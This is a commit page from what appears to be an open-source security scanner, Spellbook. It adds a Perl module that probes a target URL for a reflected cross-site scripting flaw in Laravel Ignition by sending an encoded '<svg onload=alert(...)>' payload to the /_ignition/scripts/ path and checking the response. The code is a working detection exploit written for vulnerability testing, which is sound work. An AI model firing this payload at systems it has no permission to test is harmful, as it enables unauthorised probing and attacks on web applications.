Skip to content

Commit

Permalink
add Laravel_Ignition_XSS.pm
Browse files Browse the repository at this point in the history
  • Loading branch information
Heitor Gouvêa authored and Heitor Gouvêa committed Mar 12, 2024
1 parent bea32e1 commit 8109a38
Show file tree
Hide file tree
Showing 2 changed files with 56 additions and 0 deletions.
6 changes: 6 additions & 0 deletions .config/modules.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -344,6 +344,12 @@
},
{
"id": "0057",
"category": "advisory",
"module": "Laravel_Ignition_XSS",
"description": "Laravel Ignition contains a cross-site scripting vulnerability when debug mode is enabled"
},
{
"id": "0058",
"category": "recon",
"module": "Shodan",
"description": ""
Expand Down
50 changes: 50 additions & 0 deletions lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
package Spellbook::Advisory::Laravel_Ignition_XSS {
use strict;
use warnings;
use Spellbook::Core::UserAgent;
use Spellbook::Helper::Generate_UUID;

sub new {
my ($self, $parameters) = @_;
my ($help, $target, @results);

Getopt::Long::GetOptionsFromArray (
$parameters,
"h|help" => \$help,
"t|target=s" => \$target
);

if ($target) {
if ($target !~ /^http(s)?:\/\//) {
$target = "https://$target";
}

my @uuid = Spellbook::Helper::Generate_UUID -> new(["--version" => 4, "--repeat" => 1]);
my $payload = "$target/_ignition/scripts/--%3E%3Csvg%20onload=alert%28$uuid[0]%29%3E";
my $userAgent = Spellbook::Core::UserAgent -> new();
my $request = $userAgent -> get($payload);

if (
$request -> code() == 500 &&
$request -> content() =~ m/Undefined index:/ &&
$request -> content() =~ m/$uuid[0]/
) {
push @results, $target;
}

return @results;
}

if ($help) {
return "
\rAdvisory::CVE_
\r=======================
\r-h, --help See this menu
\r-t, --target Define a target\n\n";
}

return 0;
}
}

1;

0 comments on commit 8109a38

Please sign in to comment.